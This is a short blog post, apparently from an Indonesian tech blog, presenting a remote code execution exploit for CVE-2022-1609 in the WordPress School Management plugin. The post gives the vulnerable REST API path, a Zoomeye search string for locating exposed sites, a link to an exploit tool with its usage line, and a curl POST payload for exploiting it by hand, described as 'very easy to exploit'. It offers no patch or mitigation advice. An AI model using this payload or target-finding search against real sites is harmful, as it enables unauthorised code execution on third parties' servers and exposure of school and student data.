WordPress School Management Remote Code Execution

byMuhammad Rasyad -
0

Baca Juga

WordPress School Management Remote Code Execution (RCE) vulnerability via Rest API

CVE: CVE-2022-1609
Vendor: Weblizar
Vulnerable path: /wp-json/am-member/license
Zoomeye search: "/wp-content/plugins/school-management"
Proof of concept:

Exploiting with tool
https://github.com/nastar-id/WP-school-management-RCE
Usage python wpsm.py https://localhost
Exploiting manually
Send post data to the vulnerable path

blowfish=1&blowf=rce

Example with curl:
curl -X POST https://localhost/wp-json/am-member/license -d "blowfish=1&blowf=rce"
Very easy to exploit

Tags

Muhammad Rasyad

I'm just an ordinary weeb who likes technology stuff and to learn about coding and cyber security

Anda mungkin menyukai postingan ini

Posting Komentar

Lebih baru Lebih lama